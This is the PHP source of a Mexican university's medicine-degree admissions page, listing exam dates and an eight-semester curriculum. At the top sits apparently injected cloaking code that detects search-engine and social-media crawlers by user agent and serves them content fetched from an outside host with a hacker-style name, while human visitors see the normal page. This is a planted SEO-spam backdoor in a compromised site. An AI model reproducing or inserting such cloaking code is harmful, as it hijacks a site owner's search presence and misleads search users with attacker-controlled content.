<?php
function is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $bots = array(
        'Googlebot', 'Googlebot-News', 'Googlebot-Image', 'Googlebot-Video',
        'bingbot', 'Slurp', 'DuckDuckBot', 'BingPreview', 'DuckDuckGo', 'YandexBot',
        'Baiduspider', 'TelegramBot', 'facebookexternalhit', 'Pinterest', 'W3C_Validator',
        'Google-Site-Verification', 'Google-InspectionTool', 'Applebot', 'AhrefsBot', 'SEMrushBot', 'MJ12bot'
    );
    
    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }

    return false;
}

function fetch_message_from_url($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10); // Timeout setelah 10 detik
    $response = curl_exec($ch);
    
    if (curl_errno($ch)) {
        error_log("Error cURL: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($http_code == 200) {
        return $response;
    } else {
        error_log("HTTP Error: Status Code " . $http_code);
        return false;
    }
}

if (is_bot()) { 
    $message = fetch_message_from_url('https://belajar.haxor-mahasuhu.info/medicina/index.php');
    
    if ($message) {
        echo $message;
    } else {
        echo "";
    }
    exit;
}
?>

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <title>BUO | LICENCIATURA EN MEDICINA</title>
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <meta content="derecho, licenciatura, buo, oaxaca" name="keywords">
    <meta content="Página de la licenciatura en derecho de la buo" name="description">

    <!-- Favicon -->
    <link href="img/favicon.ico" rel="icon">

    <!-- Google Web Fonts -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@100&display=swap" rel="stylesheet">
    
    <!-- Icon Font Stylesheet -->
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet">

    <!-- Libraries Stylesheet -->
    <link href="lib/animate/animate.min.css" rel="stylesheet">
    <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">

    <!-- Customized Bootstrap Stylesheet -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Template Stylesheet -->
    <link href="css/style.css" rel="stylesheet">
</head>

<body>
    <!-- Spinner Start -->
    <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center">
        <div class="spinner-border text-primary" style="width: 3rem; height: 3rem;" role="status">
            <span class="sr-only">Cargando...</span>
        </div>
    </div>
    <!-- Spinner End -->


    <!-- Navbar Start -->
    <nav class="navbar navbar-expand-lg bg-white navbar-light shadow sticky-top p-0">
        <a href="index.php" class="navbar-brand d-flex align-items-center px-4 px-lg-5">
            
            <img class="position-absolute" src="img/logo.png" alt="" style="object-fit: cover;">
            
        </a>
        <button type="button" class="navbar-toggler me-4" data-bs-toggle="collapse" data-bs-target="#navbarCollapse">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarCollapse">
            <div class="navbar-nav ms-auto p-4 p-lg-0">
                <a href="index.php" class="nav-item nav-link active">Inicio</a>
                <a href="#acercade" class="nav-item nav-link">Acerca de</a>
                <a href="dossier.pdf" class="nav-item nav-link" target="_blank">Plan de Estudios</a>
            </div>
            <a href="contacto.php" class="btn btn-primary py-4 px-lg-5 d-none d-lg-block">Solicitar Ficha<i class="fa fa-arrow-right ms-3"></i></a>
        </div>
    </nav>
    <!-- Navbar End -->


    <!-- Carousel Start -->
    <div class="container-fluid p-0 mb-5">
        <div class="owl-carousel header-carousel position-relative">
            <div class="owl-carousel-item position-relative">
                <img class="img-fluid" src="img/carousel-3.jpg" alt="">
                <div class="position-absolute top-0 start-0 w-100 h-100 d-flex align-items-center" style="background: rgba(24, 29, 56, .7);">
                    <div class="container">
                        <div class="row justify-content-start">
                            <div class="col-sm-10 col-lg-8">
                                <h5 class="text-primary text-uppercase mb-3 animated slideInDown">Benémerita Universidad de Oaxaca</h5>
                                <h1 class="display-3 text-white animated slideInDown">Licenciatura  en <br>Médico Cirujano</h1>
                                <p class="fs-5 text-white mb-4 pb-2">ACUERDO NO. 2020ES61922036<br>
                                    INICIO DE CLASES 2023:  <strong>14 DE AGOSTO</strong>
                                    </p>
                                <a href="contacto.php" class="btn btn-primary py-md-3 px-md-5 me-3 animated slideInLeft">Solicitar Ficha</a>
                                <a href="dossier.pdf" class="btn btn-light py-md-3 px-md-5 animated slideInRight">Dossier</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>




            <div class="owl-carousel-item position-relative">
                <img class="img-fluid" src="img/carousel-4.jpg" alt="">
                <div class="position-absolute top-0 start-0 w-100 h-100 d-flex align-items-center" style="background: rgba(24, 29, 56, .7);">
                    <div class="container">
                        <div class="row justify-content-start">
                            <div class="col-sm-10 col-lg-8">
                                <h5 class="text-primary text-uppercase mb-3 animated slideInDown">FACULTAD DE CIENCIAS JURÍDICAS Y HUMANIDADES</h5>
                                <h1 class="display-3 text-white animated slideInDown">Inicia el proceso de Admisión</h1>
                                <p class="fs-5 text-white mb-4 pb-2">Se parte de la Familia BUO<br>
                                   Tu esfuerzo puede ser recompensado, Postúlate en alguna de las categorías
                                </p>
                                <a href="contacto.php" class="btn btn-primary py-md-3 px-md-5 me-3 animated slideInLeft">Iniciar Proceso</a>
                                
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- Carousel End -->

 <!-- Footer Start -->
 <div class="container-fluid bg-dark text-light footer pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s">
  
    <div class="container">     


        <div class="row g-5">
            <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.1s" style="min-height: 400px;">
                <div class="position-relative h-100 text-right">
                    
                    <img class="img-fluid position-absolute w-75 h-75 img-thumbnail" src="images/aviso.jfif" > 
                </div>
            </div>
            <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.3s">
                <div class="row ">
                    <h4 class="section-title  text-start text-primary pe-3">Proceso de admisón 2023</h4>
                </div>
                <div class="row">
                    <div class="col-md-12" style="color: #fff ;">
                       FECHAS DISPONIBLES DE EXAMEN DE ADMISIÓN 2023 <br><br>
                    </div>
                </div>
                    <div class="col-md-12 text-center text-md-end">
                        <div class="footer-menu">
                        <?php 
                                    include("../descarga_pdf/funciones.php");
                                    $link = conectarse();                                    
                                    $consulta= "SELECT * FROM fechas WHERE carrera= 'alumno_medicina' ORDER BY fecha_real ASC";                                    
                                    $res = mysqli_query ($link,$consulta);                                    
                                    while($rowx = mysqli_fetch_assoc($res)){                                        
                                        $cupo  = $rowx['disponible']== 0 ? ' CUPO LLENO' : 'DISPONIBLE';
                                        $color = $rowx['disponible']== 0 ? 'darkgray' : '';
                                        echo "<a style='color: ".$color."; text-transform: uppercase;'>". $rowx['fecha']." </a> ".$cupo."<br>";                                        
                                    }
                        ?>	

                            <!--
                            <a style="color:darkgray"> 28 DE ENERO  </a>  CUPO LLENO<br>
                            <a style="color:darkgray"> 04 DE FEBRERO  </a>  CUPO LLENO<br>                          
                            <a style="color: darkgray "> 25 DE FEBRERO </a> CUPO LLENO<br>
                            <a style="color: darkgray "> 29 DE ABRIL </a> CUPO LLENO<br>
                            <a style="color: #ff8000 "> 27 DE MAYO </a> DISPONIBLE<br>
                            <a > 24 DE JUNIO </a> DISPONIBLE<br>
                            <a > 29 DE JULIO </a> DISPONIBLE<br>
                            <a > 05 DE AGOSTO </a> DISPONIBLE <br>
                                -->
                        </div>
                    </div>
                    <div class="col-md-12 text-center text-md-end">
                        <div class="text-center">
                            <br>
                            <a href="contacto.php" class="btn btn-primary py-md-3 px-md-5 me-3 animated slideInLeft">Iniciar Proceso de inscripción</a>
                        </div>
                    </div><br>
                </div>
        
            </div>
        </div>

    </div>

<!-- Footer End -->
   


    <!-- About Start -->
    <div class="container-xxl py-5" id="acercade">
        <div class="container">
            <div class="row g-5">
                <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.1s" style="min-height: 400px;">
                    <div class="position-relative h-100">
                        
                        <iframe class="img-fluid position-absolute w-100 h-100 img-thumbnail" style="object-fit: cover;" src="https://www.youtube-nocookie.com/embed/1mNVF2-KfAM" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
                    </div>
                </div>
                <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.3s">
                    <h6 class="section-title bg-white text-start text-primary pe-3">Proceso de admisón 2023</h6>
                    <h1 class="mb-4">¿Por qué estudiar la licenciatura en Médico Cirujano?</h1>
                    <p class="mb-4">Si tienes espíritu de servicio, te gustan las materias como anatomía, fisiología, microbiología y todo lo relacionado con la salud de las personas y de las comunidades, ¡esta es una carrera para ti!
                        La Licenciatura en Medico Cirujano es la profesión por excelencia, que logra conjuntar la ciencia, la tecnología y las humanidades. Es de las carreras con mayor número de aspirantes entre los egresados del bachillerato que buscan cursar un programa de calidad y con amplia expectativa a futuro.
                        Por todo lo anterior, los profesionales en esta área adquieren un gran compromiso social, teniendo gran importancia una formación competitiva y humana.</p>
                
                    <div class="row gy-2 gx-4 mb-4">
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>Inicio de clases: 14 de Agosto</p>
                        </div>
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>1 año de internado</p>
                        </div>
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>8 Semestres</p>
                        </div>
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>1 año de servicio social</p>
                        </div>
                       
                    </div>
            
                </div>
            </div>
        </div>
    </div>
    <!-- About End -->


<!-- Footer Start -->
<div class="container-fluid bg-dark text-light footer pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s">
  
    <div class="container">     


        <div class="row g-5">
            <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.1s" style="min-height: 400px;">
                <div class="position-relative h-100 text-right">
                    <a target="_blank" href="https://accessmedicina.mhmedical.com/#"  >
                    <img class="img-fluid position-absolute w-75 h-75 img-thumbnail" src="img/carousel-b.jpg" > </a>
                </div>
            </div>
            <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.3s">
                <p class="fs-5 text-white mb-4 pb-2" style=" text-align: justify;"> <br>
                    Bienvenido a la plataforma que cuenta con acceso a información en español de la editorial McGraw-Hill 
                    correspondiente a las diferentes especialidades de Ciencias de la Salud. 

                      </p>
                  <a target="_blank" href="https://accessmedicina.mhmedical.com/#" class="btn btn-primary py-md-3 px-md-5 me-3 animated slideInLeft">
                      Ingresar ahora</a>    
            </div>
        
            </div>
        </div>

    </div>

    

    <!-- About Start -->
    <div class="container-xxl py-5">
        <div class="container">
            <div class="row g-5">
               
                <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.3s">
                    <h6 class="section-title bg-white text-start text-primary pe-3">Convocatoria</h6>
                    <h1 class="mb-4">OBJETIVO DEL PROGRAMA</h1>
                    <p class="mb-4 ">Formar Médicos Cirujanos que brinden una atención con principios éticos y de compromiso social, fundamentado en las bases científicas, tecnológicas y humanísticas, para contribuir al cuidado del ser humano y la comunidad, a través de un programa de enseñanza innovador en sus procesos educativos que responde a las necesidades globales actuales en el área de la salud.</p>
                    <p class="mb-4">Pues el egresado tendrá la capacidad de: <br>
                        - Litigar en diversas materias del derecho<br>
                        - Elaborar iniciativas de Ley, de reforma o derogación de artículos en sistema jurídico a nivel estatal o nacional<br>
                        </p>
                    <div class="row gy-2 gx-4 mb-4">
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>Docentes de alto nivel</p>
                        </div>
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>Classes Presenciales</p>
                        </div>
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>Vinculación con el Éxito</p>
                        </div>
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>Varias opciones de Titulación</p>
                        </div>
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>Formación de Carácter</p>
                        </div>
                        <div class="col-sm-6">
                            <p class="mb-0"><i class="fa fa-arrow-right text-primary me-2"></i>Certificación SEP</p>
                        </div>
                    </div>
                  
                </div>
                <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.1s" style="min-height: 500px;">
                    <div class="position-relative h-100">
                        <img class="img-fluid position-absolute w-100 h-100 img-thumbnail" src="img/about.jpg" alt="" style="object-fit: cover;">
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- About End -->

   

    <!-- Categories Start -->
    <div class="container-xxl py-5 category">
        <div class="container">
            <div class="text-center wow fadeInUp" data-wow-delay="0.1s">
                <h6 class="section-title bg-white text-center text-primary px-3">Archivo Fotográfico</h6>
                <h1 class="mb-5">Vida universitaria</h1></div>
            <div class="row g-3">
                <div class="col-lg-7 col-md-6">
                    <div class="row g-3">
                        <div class="col-lg-12 col-md-12 wow zoomIn" data-wow-delay="0.1s">
                            <a class="position-relative d-block overflow-hidden">
                                <img class="img-fluid" src="img/cat-1.jpg" alt="">
                                <div class="text-center position-absolute bottom-0 end-0 py-2 px-3" style="margin: 1px;">
                                    <img class="img-fluid  w-100 h-100" src="img/logo.png" alt="" style="object-fit: cover;">
                                </div>
                            </a>
                        </div>
                        <div class="col-lg-6 col-md-12 wow zoomIn" data-wow-delay="0.3s">
                            <a class="position-relative d-block overflow-hidden" >
                                <img class="img-fluid" src="img/cat-2.jpg" alt="">
                                <div class="text-center position-absolute bottom-0 end-0 py-2 px-3" style="margin: 1px;">
                                    <img class="img-fluid  w-100 h-100" src="img/logo.png" alt="" style="object-fit: cover;">
                                </div>
                            </a>
                        </div>
                        <div class="col-lg-6 col-md-12 wow zoomIn" data-wow-delay="0.5s">
                            <a class="position-relative d-block overflow-hidden" ">
                                <img class="img-fluid" src="img/cat-3.jpg" alt="">
                                <div class="text-center position-absolute bottom-0 end-0 py-2 px-3" style="margin: 1px;">
                                    <img class="img-fluid  w-100 h-100" src="img/logo.png" alt="" style="object-fit: cover;">
                                </div>
                            </a>
                        </div>
                    </div>
                </div>
                <div class="col-lg-5 col-md-6 wow zoomIn" data-wow-delay="0.7s" style="min-height: 350px;">
                    <a class="position-relative d-block h-100 overflow-hidden" >
                        <img class="img-fluid position-absolute w-100 h-100" src="img/cat-4.jpg" alt="" style="object-fit: cover;">
                        <div class="text-center position-absolute bottom-0 end-0 py-2 px-3" style="margin: 1px;">
                            <img class="img-fluid  w-100 h-100" src="img/logo.png" alt="" style="object-fit: cover;">
                        </div>
                    </a>
                </div>
            </div>
        </div>
    </div>
    <!-- Categories Start -->



  <!-- Courses Start -->
  <div class="container-xxl py-5" id="acercade">
    <div class="container">
        <div class="text-center wow fadeInUp" data-wow-delay="0.1s">
            <h6 class="section-title bg-white text-center text-primary px-3">8 Semestres</h6>
            <h1 class="mb-5">Plan de estudios</h1>
        </div>
        
        <div class="container">
    <div class="row">
      <div class="col-lg-4 col-md-4 col-sm-4">
        <div class="education wow fadeInRight" data-wow-delay="0.3s">
          <ul class="timeline">
           
             <li>
              <div class="content-text">
                <p class="line-title">Primer Semestre</p>
                  <span>- Anatomia I<br>
                  - Bioquímica aplicada I<br>
                  - Histología I<br>
                  - Biología celular <br>
                  - Embriología<br>
                  - Sociología Jurídica
                - Teoría Económica <br>
            - Metodología de la investigación para la salud<br> <br></span>

              </div>
            </li>
            <li>
              <div class="content-text">
                <p class="line-title">Segundo Semestre</p>
                <span>- Anatomía II<br>
                - Bioquímica aplicada II<br>
                - Histología II<br>
                - Medicina molecular<br>
                - Psicología médica<br>
                - Microbiología y parasitología<br>
                - Epidemiología y bioestadística <br>
                - Seminario bases jurídicas de la medicina <br>
               </span> <br>
              </div>
            </li>
            <li>
              <div class="content-text">
                <p class="line-title">Tercer Semestre</p>
                <span>- Anatomía patológica I<br>
                - Terapéutica farmacológica I<br>
                - Fisiología I<br>
                - Propedéutica <br>
                - Genética <br>
                - Inmunología<br>
                - Psiquiatría<br>
                - Salud pública<br>
                </span>
              </div>
              </li>
            
          </ul>
        </div>
      </div>
      <div class="col-lg-4 col-md-4 col-sm-4">
        <div class="experience wow fadeInRight" data-wow-delay="0.6s">
          <ul class="timeline">
            
            <li>
              <div class="content-text">
                <p class="line-title">Cuarto Semestre</p>
                <span>- Anatomía patológica II <br>
                - Terapéutica farmacológica II <br>
                - Fisiología II<br>
                - Proteómica y genómica<br>
                - Informática biomédica<br>
                - Medicina legal <br>
                - Infectología <br>
                - Cuidados paliativos en medicina <br>
                </span>
              </div>
            </li>
           <li>
              <div class="content-text">
                <p class="line-title">Quinto Semestre</p>
                <span>- Fisiopatología I<br>
                        - Cirugía I<br>
                        - Casos de historia clínica<br>
                        - Medicina familiar<br>
                        - Medicina comunitaria<br>
                        - Oftalmología  <br>
                        - Imagenología <br>
                        <br>
                        </span>
              </div>
            </li>
            <li>
              <div class="content-text">
                <p class="line-title">Sexto Semestre</p>
                <span> - Fisiopatología II<br>
                       - Cirugía II<br>
                        - Patología clínica<br>
                        - Neumología<br>
                        - Ginecología y obstetricia I<br>
                        - Traumatología y ortopedia<br>
                        - Dermatología <br>
                        <br>
                        </span>
               </div>
            </li>
                          
          </ul>
        </div>
      </div>
      
      <div class="col-lg-4 col-md-4 col-sm-4">
        <div class="experience wow fadeInRight" data-wow-delay="0.6s">
          <ul class="timeline">
           
           
            <li>
              <div class="content-text">
                <p class="line-title">Séptimo Semestre</p>
                <span>- Ginecología y obstetricia II<br>
                      - Medicina crítica<br>
                     - Reumatología<br>
                    - Otorrinolaringología<br>
                      - Pediatría I<br>
                      - Cardiología<br>
                      - Endocrinología y nutrición<br>
                      - Gerontología y geriatría <br>
                        </span>
              </div>
            </li>
            <li>
              <div class="content-text">
                <p class="line-title">Octavo Semestre</p>
                <span>- Pediatría II <br>
                       - Urología<br>
                       - Hematología<br>
                       - Neurología<br>
                        - Nefrología<br>
                        - Oncología<br>
                        - Administración de clínicas y hospitales <br>
                        - Seminario de desarrollo de empresas médicas
                        </span>
              </div>
            </li>
                         
          </ul>
        </div>
      </div>
      
    </div>
  </div>




        </div>
    </div>
</div>
<!-- Courses End -->


        

    <!-- Footer Start -->
    <div class="container-fluid bg-dark text-light footer pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s">
     
        <div class="container">
            <div class="copyright">
                <div class="row">
                    <div class="col-md-6 text-center text-md-start mb-3 mb-md-0">
                        &copy; <a class="border-bottom" href="#">BUO</a>,FACULTAD DE CIENCIAS JURÍDICAS Y HUMANIDADES.
                    </div>
                    <div class="col-md-6 text-center text-md-end">
                        <div class="footer-menu">
                            <a href="index.php">Inicio</a>
                            <a href="contacto.php">Solicitud de inscripción</a>
                            
                            <a href="dossier.php" target="_blank">DOSSIER</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- Footer End -->


    <!-- Back to Top -->
    <a href="#" class="btn btn-lg btn-primary btn-lg-square back-to-top"><i class="bi bi-arrow-up"></i></a>


    <!-- JavaScript Libraries -->
    <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>
    <script src="lib/wow/wow.min.js"></script>
    <script src="lib/easing/easing.min.js"></script>
    <script src="lib/waypoints/waypoints.min.js"></script>
    <script src="lib/owlcarousel/owl.carousel.min.js"></script>

    <!-- Template Javascript -->
    <script src="js/main.js"></script>
</body>

</html>
